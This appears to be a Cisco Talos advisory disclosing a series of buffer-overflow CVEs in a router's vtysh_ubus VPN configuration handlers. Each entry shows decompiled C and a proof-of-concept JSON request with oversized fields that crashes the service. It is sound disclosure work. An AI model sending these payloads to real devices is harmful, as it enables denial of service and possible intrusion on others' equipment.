CVE-2023-25107 - set_gre - remote_subnet, remote_mask

the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function. In the set_gre function the remote_subnet and the remote_mask JSON keys are used to fetch its respective values:

is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
	remote_subnet = (char *)blobmsg_get_string(table_value);
}
else {
	is_equal = strcmp(table_key,"remote_mask");
	if (is_equal == 0) {
		remote_mask = (char *)blobmsg_get_string(table_value);
	}

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_gre",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_gre",
			"index": 1,
			"value": {
				"remote_subnet": "A"*0x300,
				"remote_mask": "POC",
			}
		}
	]
}

CVE-2023-25108 - set_gre - remote_ip

the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function. In the set_gre function the remote_ip JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"remote_ip");
if (is_equal == 0) {
	vtysh_command_argument = (char *)blobmsg_get_string(table_value);
	vtysh_command_format = "tunnel destination %s";
    [...]
}

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_gre",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_gre",
			"index": 1,
			"value": {
				"remote_ip": "A"*0x300,
			}
		}
	]
}

CVE-2023-25109 - set_gre - local_ip

the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function. In the set_gre function the local_ip JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"local_ip");
if (is_equal == 0) {
        vtysh_command_argument = (char *)blobmsg_get_string(table_value);
        vtysh_command_format = "tunnel source %s";
        [...]
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_gre",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_gre",
			"index": 1,
			"value": {
				"local_ip": "A"*0x300,
			}
		}
	]
}

CVE-2023-25110 - set_gre - remote_virtual_ip

the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function. In the set_gre function the remote_virtual_ip JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"remote_virtual_ip");
if (is_equal == 0) {
        vtysh_command_argument = (char *)blobmsg_get_string(table_value);
        vtysh_command_format = "ip address peer %s";
        [...]
} This function will then call the `set_gre` function, Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_gre",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_gre",
			"index": 1,
			"value": {
				"remote_virtual_ip": "A"*0x300,
			}
		}
	]
}

CVE-2023-25111 - set_gre - key

the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function. In the set_gre function the key JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"key");
if (is_equal == 0) {
        vtysh_command_argument = (char *)blobmsg_get_string(table_value);
        if (*vtysh_command_argument != '\0') {
                vtysh_command_format = "tunnel key %s";
               [...]
        }
        [...]
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_gre",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_gre",
			"index": 1,
			"value": {
				"key": "A"*0x300,
			}
		}
	]
}

CVE-2023-25112 - set_l2tp - remote_subnet, remote_mask

the vpn_l2tp_handler_set function is the entry point for one of the functionality. This function will eventually call the set_l2tp function. In the set_l2tp function the remote_subnet and the remote_mask JSON keys are used to fetch its respective values:

is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
	[...]
	if (table_value != (char *)0x0) {
		remote_subnet = (char *)blobmsg_data(table_value);
	}
}
[...]
is_equal = strcmp(table_key,"remote_mask");
if (is_equal == 0) {
    [...]
    if (table_value != (char *)0x0) {
        remote_mask = (char *)blobmsg_data(table_value);
    }
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_vpn_l2tp",
    "function": "set",
    "values": [
        {
            "base": "yruo_vpn_l2tp",
            "index": 1,
            "value": {
                "remote_subnet": "A"*0x300,
                "remote_mask": "A",
            }
        }
    ]
}

CVE-2023-25113 - set_l2tp - key

the vpn_l2tp_handler_set function is the entry point for one of the functionality. This function will eventually call the set_l2tp function. In the set_l2tp function the key JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"key");
[...]
if ((is_equal == 0) && ([...], table_value != (char *)0x0)) {
	key = (char *)blobmsg_data(table_value);
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"secret %s",key);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_l2tp",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_l2tp",
			"index": 1,
			"value": {
				"key": "A"*0x300,
			}
		}
	]
}

CVE-2023-25114 - set_openvpn_client - expert_options

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the expert_options JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"expert_options");
if (is_equal != 0) {
    [...]
}
expert_options = blobmsg_get_string(table_value);

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"options %s",expert_options);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_openvpn_client",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_openvpn_client",
			"index": 1,
			"value": {
				"expert_options": "A"*0x600,
			}
		}
	]
}

CVE-2023-25115 - set_openvpn_client - remote_ip, port

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the remote_ip, port JSON keys is used to fetch its respective values:

is_equal = strcmp(table_key,"remote_ip");
if (is_equal == 0) {
	remote_ip = blobmsg_get_string(table_value);
    [...]
}
[...]
is_equal = strcmp(table_key,"port");
if (is_equal == 0) {
	port = blobmsg_get_u32(table_value);
	[...]
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"ip remote server %s port %d",remote_ip,port);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_vpn_openvpn_client",
    "function": "set",
    "values": [
        {
            "base": "yruo_vpn_openvpn_client",
            "index": 1,
            "value": {
                "remote_ip": "A"*0x600,
                "port": 1,
            }
        }
    ]
}

CVE-2023-25116 - set_openvpn_client - local_virtual_ip, remote_virtual_ip

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the local_virtual_ip, remote_virtual_ip JSON keys is used to fetch its respective values:

is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal == 0) {
        local_virtual_ip = (char *)blobmsg_get_string(table_value);

is_equal = strcmp(table_key,"remote_virtual_ip");
if (is_equal == 0) {
        remote_virtual_ip = (char *)blobmsg_get_string(table_value);
        [...]
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"ip address static local %s peer %s",local_virtual_ip,remote_virtual_ip);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_openvpn_client",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_openvpn_client",
			"index": 1,
			"value": {
				"local_virtual_ip": "A"*0x600,
				"remote_virtual_ip": "POC",
			}
		}
	]
}

CVE-2023-25117 - set_openvpn_client - local_virtual_ip, local_virtual_mask

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the local_virtual_ip and local_virtual_mask JSON keys is used to fetch its respective values:

is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal != 0) {
    [...]
}
local_virtual_ip = (char *)blobmsg_get_string(table_value);
[...]
is_equal = strcmp(table_key,"local_virtual_mask");
if (is_equal == 0) {
    local_virtual_mask = (char *)blobmsg_get_string(table_value);
    [...]
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"ip address static local %s mask %s",local_virtual_ip,local_virtual_mask);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_openvpn_client",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_openvpn_client",
			"index": 1,
			"value": {
				"local_virtual_mask": "A"*0x600,
				"local_virtual_ip": "POC",
			}
		}
	]
}

CVE-2023-25118 - set_openvpn_client - username, password

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the username and password JSON keys is used to fetch its respective values:

is_equal = strcmp(table_key,"username");
if (is_equal == 0) {
	username = (char *)blobmsg_get_string(table_value);
	[...]
}
[...]
is_equal = strcmp(table_key,"password");
if (is_equal == 0) {
	password = (char *)blobmsg_get_string(table_value);
    [...]
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"username %s password %s",username,password);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_openvpn_client",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_openvpn_client",
			"index": 1,
			"value": {
				"username": "A"*0x600,
				"password": "POC",
			}
		}
	]
}

CVE-2023-25119 - set_pptp - remote_subnet, remote_mask

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the remote_subnet and remote_mask JSON keys is used to fetch its respective values:

is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
	[...]
	if (table_value != (char *)0x0) {
		remote_subnet = (char *)blobmsg_data(table_value);
	}
}
else {
	is_equal = strcmp(table_key,"remote_mask");
	[...]
	if ((is_equal == 0) && ([...], table_value != (char *)0x0)) {
		remote_mask = (char *)blobmsg_data(table_value);
	}
}

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_pptp",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_pptp",
			"index": 1,
			"value": {
				"remote_subnet": "A"*0x600,
				"remote_mask": "POC",
			}
		}
	]
}

CVE-2023-25120 - set_dmvpn - cisco_secret

the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_dmvpn function. in the set_dmvpn function the cisco_secret JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"cisco_secret");
if (is_equal == 0) {
    cisco_secret = (char *)blobmsg_get_string(table_value);
    if (*cisco_secret != '\0') {
        command_format_string = "ip nhrp authentication %s";
        [...]
    } Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,command_format_string,cisco_secret);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_dmvpn",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_dmvpn",
			"index": 1,
			"value": {
				"cisco_secret": "A"*0x600,
			}
		}
	]
}

CVE-2023-25121 - set_ike_profile - secrets_local

the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_ike_profile function. In the set_ike_profile function the secrets_local JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"secrets_local");
if (is_equal == 0) {
        if(version == 1){
            command_argument = blobmsg_get_string(table_value);
            command_format_string = "pre-shared-key %s";
        }
        else{
            if(version == 2){
                command_argument = blobmsg_get_string(table_value);
                command_format_string = "pre-shared-key local %s";
            }
        }
        [...]
    }

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,command_format_string,command_argument);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 7,
	"execute": 1,
	"core": "yruo_vpn_ipsec_client",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_ipsec_client",
			"index": 1,
			"value": {
				"secrets_local": "A"*0x300,
				"version": 1,
			}
		}
	]
}

CVE-2023-25122 - set_openvpn_client - old_remote_subnet, old_remote_mask

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the old_remote_subnet, old_remote_mask JSON keys is used to fetch its respective values:

is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
  action = blobmsg_get_u32(table_value);
}
else {
  is_equal = strcmp(table_key,"remote_subnet");
  if (is_equal == 0) {
    remote_subnet = blobmsg_get_string(table_value);
  }
  else {
    is_equal = strcmp(table_key,"remote_mask");
    if (is_equal == 0) {
      remote_mask = blobmsg_get_string(table_value);
    }
    else {
      is_equal = strcmp(table_key,"old_remote_subnet");
      if (is_equal == 0) {
        old_remote_subnet = blobmsg_get_string(table_value);
      }
      else {
        is_equal = strcmp(table_key,"old_remote_mask");
        if (is_equal == 0) {
          old_remote_mask = blobmsg_get_string(table_value);
        }
      }
    }
  } Eventually the following portion of code is reached:

  if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
    if (action == 2) {
      if (old_remote_mask == 0 || old_remote_subnet == 0) goto OTHER_BRANCH;
      sprintf(vtysh_command_buffer,"no remote subnet %s mask %s",old_remote_subnet,old_remote_mask);
      [...]
    }
   [...]
  }

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_vpn_openvpn_client",
    "function": "set",
    "values": [
        {
            "base": "yruo_vpn_openvpn_client",
            "index": 1,
            "value": {
                "remote_subnet":[{
                    "remote_mask":"",
                    "remote_subnet":"",
                    "old_remote_subnet": "A"*0x600,
                    "old_remote_mask": "POC",
                    "action":2,
                }]
            }
        }
    ]
}

CVE-2023-25123 - set_openvpn_client - remote_subnet, remote_mask. action is 2

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the remote_subnet, remote_mask JSON keys is used to fetch its respective values:

is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
  action = blobmsg_get_u32(table_value);
}
else {
  is_equal = strcmp(table_key,"remote_subnet");
  if (is_equal == 0) {
    remote_subnet = blobmsg_get_string(table_value);
  }
  else {
    is_equal = strcmp(table_key,"remote_mask");
    if (is_equal == 0) {
      remote_mask = blobmsg_get_string(table_value);
    }
    else {
      is_equal = strcmp(table_key,"old_remote_subnet");
      if (is_equal == 0) {
        old_remote_subnet = blobmsg_get_string(table_value);
      }
      else {
        is_equal = strcmp(table_key,"old_remote_mask");
        if (is_equal == 0) {
          old_remote_mask = blobmsg_get_string(table_value);
        }
      }
    }
  } Eventually the following portion of code is reached:

  if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
    if (action == 2) {
      if (old_remote_mask == 0 || old_remote_subnet == 0) goto OTHER_BRANCH;
      [...]
      sprintf(vtysh_command_buffer,"remote subnet %s mask %s",remote_subnet,remote_mask);
    }
   [...]
  }

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_vpn_openvpn_client",
    "function": "set",
    "values": [
        {
            "base": "yruo_vpn_openvpn_client",
            "index": 1,
            "value": {
                "remote_subnet":[{
                    "remote_mask":"A"*0x600,
                    "remote_subnet":"",
                    "old_remote_subnet": "",
                    "old_remote_mask": "",
                    "action":2,
                }]
            }
        }
    ]
}

CVE-2023-25124 - set_openvpn_client - remote_subnet, remote_mask

the vpn_openvpn_client_handler_set function is the entry point for one of the functionality. This function will eventually call the set_openvpn_client function. In the set_openvpn_client function the remote_subnet, remote_mask JSON keys is used to fetch its respective values:

is_equal = strcmp(table_key,"action");
if (is_equal == 0) {
  action = blobmsg_get_u32(table_value);
}
else {
  is_equal = strcmp(table_key,"remote_subnet");
  if (is_equal == 0) {
    remote_subnet = blobmsg_get_string(table_value);
  }
  else {
    is_equal = strcmp(table_key,"remote_mask");
    if (is_equal == 0) {
      remote_mask = blobmsg_get_string(table_value);
    }
    [...]
  }

Eventually the following portion of code is reached:

  if (remote_mask != 0 && (action != -1 && remote_subnet != 0)) {
    if (action == 2) {
      [...]
    }
    else {
      if (action == 3) {
        command_format_string = "no remote subnet %s mask %s";
      }
      else {
        if (action == 1){
        	command_format_string = "remote subnet %s mask %s";
		}
		else{
			[...]
		}
      }
      sprintf(vtysh_command_buff,command_format_string,remote_subnet,remote_mask);
    }
	[...]
  } The format string used will depends on the value of the `action` variable.

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_vpn_openvpn_client",
    "function": "set",
    "values": [
        {
            "base": "yruo_vpn_openvpn_client",
            "index": 1,
            "value": {
                "remote_subnet":[{
                    "remote_mask":"A"*0x600,
                    "remote_subnet":"",
                    "action":3,
                }]
            }
        }
    ]
}
VENDOR RESPONSE

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html

TIMELINE

2023-02-14 - Initial Vendor Contact
2023-02-21 - Vendor Disclosure
2023-07-06 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.


Vulnerability Reports Next Report

TALOS-2023-1714

Previous Report

TALOS-2023-1713

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

EPSS

0.001

Percentile

43.3%

Related for TALOS-2023-1716